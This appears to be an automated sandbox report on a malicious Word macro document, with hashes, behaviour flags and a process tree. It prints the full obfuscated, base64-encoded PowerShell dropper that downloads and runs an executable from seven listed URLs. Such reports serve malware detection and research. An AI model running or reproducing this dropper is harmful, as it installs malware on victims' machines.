Analysis

  • max time kernel
    118s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 01:29

General

  • Target

    694a76b09d502b6d0cf0f9f0eb3e203d_JaffaCakes118.doc

  • Size

    220KB

  • MD5

    694a76b09d502b6d0cf0f9f0eb3e203d

  • SHA1

    ba55e49aef510478e66c0b5571370a2c3a9eb9ff

  • SHA256

    9949e3d333621f908c51a04136a6b85f266068d36c239f2ae844bb50e4cd4bf5

  • SHA512

    ecf84e8dc9c540d861eac992666cc3ad1962cf41749037f03d426c351969e29dc9e7529558dfdcc239c4571002c41a22d1f9bd72064fdd0d960d1bfc30b460ff

  • SSDEEP

    3072:b4tcTvjvTY140818tIP4ovpLSGju9jDW1M+7Qp3S:EtcnvE140o8tIP4ap8jDjmGS

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://hottco.com/stats/erd/

exe.dropper

http://dutarini.com/cgi-bin/6/

exe.dropper

https://brownshotelgroup.com/www.brownshotelgroup.com.pt/i9/

exe.dropper

http://pastaciyiz.biz/wp-includes/fvx/

exe.dropper

https://dogaltrm.com/components/r6h/

exe.dropper

https://dortislem.net/administrator/c/

exe.dropper

https://onyourleftracing.com/cgi-bin/QcC/

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\694a76b09d502b6d0cf0f9f0eb3e203d_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1284
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -en JABHAHQAagB0ADYAZwBfAD0AKAAnAFMAcQAnACsAKAAnAHUAegAnACsAJwB6AG4AagAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAcgBwAHIAbwBmAEkAbABlAFwAZQBsAGIAUQA4AEsASABcAEwAcQBNAGYAZQBqADQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAYABVAHIAYABJAFQAWQBwAHIAbwBUAE8AYABjAG8AbAAiACAAPQAgACgAKAAnAHQAbABzACcAKwAnADEAMgAnACkAKwAnACwAJwArACcAIAAnACsAJwB0ACcAKwAoACcAbABzADEAMQAnACsAJwAsACAAJwArACcAdABsACcAKQArACcAcwAnACkAOwAkAFoAYgB0AG8AaABkADcAIAA9ACAAKAAnAFUAJwArACgAJwAxACcAKwAnADgAbQBpAGEAegBxACcAKQApADsAJABDAG0AMwBkAG0AbAAyAD0AKAAnAFIAZQAnACsAKAAnAHkANQAnACsAJwBtADgAJwApACsAJwBhACcAKQA7ACQAVABtAGkANABoAHAAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAGcARwAnACsAJwB4ACcAKQArACcARQAnACsAJwBsACcAKwAoACcAYgBxADgAJwArACcAawAnACkAKwAoACcAaAAnACsAJwBnAEcAeAAnACkAKwAoACcATABxACcAKwAnAG0AZgBlAGoAJwApACsAKAAnADQAZwAnACsAJwBHAHgAJwApACkAIAAtAHIAZQBQAGwAYQBjAEUAIAAgACgAWwBjAGgAQQBSAF0AMQAwADMAKwBbAGMAaABBAFIAXQA3ADEAKwBbAGMAaABBAFIAXQAxADIAMAApACwAWwBjAGgAQQBSAF0AOQAyACkAKwAkAFoAYgB0AG8AaABkADcAKwAoACgAJwAuACcAKwAnAGUAeAAnACkAKwAnAGUAJwApADsAJABBADEAcQAxAHMAcABkAD0AKAAoACcAUgBuACcAKwAnAHAAbQAnACkAKwAnAHEAdwAnACsAJwBqACcAKQA7ACQARAAxAGUAYQA2AGMAMAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAATgBlAFQALgBXAEUAQgBDAEwAaQBFAG4AVAA7ACQATABpADcAdQAxAGkAMwA9ACgAKAAnAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AaABvACcAKQArACgAJwB0ACcAKwAnAHQAYwBvACcAKwAnAC4AYwBvAG0ALwAnACkAKwAoACcAcwB0AGEAJwArACcAdABzACcAKQArACgAJwAvAGUAJwArACcAcgBkAC8AJwApACsAJwAqAGgAJwArACcAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAZAAnACsAJwB1AHQAJwArACcAYQByAGkAbgBpAC4AJwArACcAYwBvAG0ALwBjACcAKQArACcAZwBpACcAKwAoACcALQBiACcAKwAnAGkAbgAnACsAJwAvADYALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAcwA6AC8AJwApACsAKAAnAC8AYgAnACsAJwByAG8AdwBuAHMAJwArACcAaABvAHQAJwApACsAKAAnAGUAJwArACcAbABnAHIAJwApACsAKAAnAG8AdQBwAC4AJwArACcAYwBvACcAKQArACcAbQAnACsAKAAnAC8AJwArACcAdwB3ACcAKwAnAHcALgBiAHIAJwApACsAKAAnAG8AdwBuACcAKwAnAHMAaAAnACkAKwAoACcAbwB0AGUAJwArACcAbABnAHIAJwApACsAJwBvAHUAJwArACgAJwBwAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAuAHAAJwArACgAJwB0ACcAKwAnAC8AaQAnACkAKwAoACcAOQAvACoAaAAnACsAJwB0AHQAcAAnACsAJwA6ACcAKQArACcALwAnACsAJwAvACcAKwAnAHAAJwArACgAJwBhAHMAdAAnACsAJwBhAGMAJwApACsAKAAnAGkAeQBpAHoALgAnACsAJwBiACcAKQArACgAJwBpAHoALwB3AHAAJwArACcALQBpAG4AJwArACcAYwAnACsAJwBsAHUAZABlAHMALwAnACkAKwAoACcAZgB2AHgALwAqAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAKAAnAHMAOgAvACcAKwAnAC8AJwApACsAKAAnAGQAbwAnACsAJwBnACcAKQArACgAJwBhACcAKwAnAGwAdAAnACkAKwAoACcAcgAnACsAJwBtAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AYwAnACkAKwAnAG8AJwArACgAJwBtAHAAJwArACcAbwBuACcAKwAnAGUAbgAnACkAKwAoACcAdABzAC8AJwArACcAcgAnACkAKwAoACcANgBoACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACcAcwAnACsAKAAnADoALwAvAGQAJwArACcAbwAnACkAKwAoACcAcgB0AGkAJwArACcAcwAnACkAKwAoACcAbAAnACsAJwBlAG0AJwApACsAKAAnAC4AJwArACcAbgBlAHQALwBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAGkAcwB0AHIAYQB0ACcAKwAnAG8AcgAvACcAKwAnAGMALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdAAnACkAKwAnAHAAcwAnACsAKAAnADoALwAvAG8AJwArACcAbgAnACsAJwB5AG8AJwApACsAKAAnAHUAcgBsAGUAJwArACcAZgAnACkAKwAnAHQAJwArACgAJwByAGEAYwAnACsAJwBpACcAKwAnAG4AZwAuAGMAbwAnACkAKwAnAG0ALwAnACsAKAAnAGMAZwBpAC0AYgBpAG4AJwArACcALwBRACcAKwAnAGMAJwArACcAQwAnACkAKwAnAC8AJwApAC4AIgBzAGAAUABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFYAbwAyADUAaQA4AG8APQAoACgAJwBWAHEAJwArACcAYQBpAHYAJwApACsAJwA1AHEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVAB5AHEAZAB4AGsAcQAgAGkAbgAgACQATABpADcAdQAxAGkAMwApAHsAdAByAHkAewAkAEQAMQBlAGEANgBjADAALgAiAEQATwBXAGAATgBsAE8AQQBkAEYAYABJAEwAZQAiACgAJABUAHkAcQBkAHgAawBxACwAIAAkAFQAbQBpADQAaABwAHMAKQA7ACQAWABhAGgAawBqADEAeAA9ACgAKAAnAEcAdQAnACsAJwBwADAANwAnACkAKwAnAG8AJwArACcANAAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQAVABtAGkANABoAHAAcwApAC4AIgBsAGAARQBOAEcAVABoACIAIAAtAGcAZQAgADIAMQA1ADkANgApACAAewAuACgAJwBJAG4AdgAnACsAJwBvAGsAJwArACcAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABUAG0AaQA0AGgAcABzACkAOwAkAFcAYQAwAGYAaABlAGQAPQAoACcASQA4ACcAKwAoACcAYwBwADYAeAAnACsAJwA2ACcAKQApADsAYgByAGUAYQBrADsAJABQAHEAcQBvAF8AdgBlAD0AKAAnAEIAJwArACgAJwB2ACcAKwAnAHkAcwBxACcAKQArACcAagBxACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBuADEANQByAHgAMQA9ACgAKAAnAEMAOQAnACsAJwA5ACcAKwAnADQAdQBrACcAKQArACcAbwAnACkA
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2680

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      9bbc0b95354bce9a77b2e66f271275ec

      SHA1

      ef7bc8dadb10a5fb61b34482fe0bdbc886ce8ebe

      SHA256

      61c82fc16362847d363dcd16fc483b52fffc0ede885c11afff210e372d9f64aa

      SHA512

      34082b65b340153df37187ec7e58c4937d082429821b6d287e4eabd2fa7abccae8bcd1c2a00cd55153c1489a1e71d4da4eb87f55fe12ff508f691e61cc84d1ec

    • memory/1712-20-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-49-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-6-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-7-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-8-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-9-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-33-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-32-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-31-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-30-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-29-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-28-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-27-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-19-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-25-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-24-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-23-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-22-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-69-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1712-2-0x0000000070D1D000-0x0000000070D28000-memory.dmp
      Filesize

      44KB

    • memory/1712-26-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-18-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-17-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-15-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-16-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-14-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-13-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-12-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-11-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-10-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-70-0x0000000070D1D000-0x0000000070D28000-memory.dmp
      Filesize

      44KB

    • memory/1712-21-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-48-0x0000000070D1D000-0x0000000070D28000-memory.dmp
      Filesize

      44KB

    • memory/1712-0-0x000000002FA21000-0x000000002FA22000-memory.dmp
      Filesize

      4KB

    • memory/1712-50-0x0000000006360000-0x0000000006460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-51-0x0000000000360000-0x0000000000460000-memory.dmp
      Filesize

      1024KB

    • memory/1712-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2680-40-0x00000000021D0000-0x00000000021D8000-memory.dmp
      Filesize

      32KB

    • memory/2680-39-0x000000001B750000-0x000000001BA32000-memory.dmp
      Filesize

      2.9MB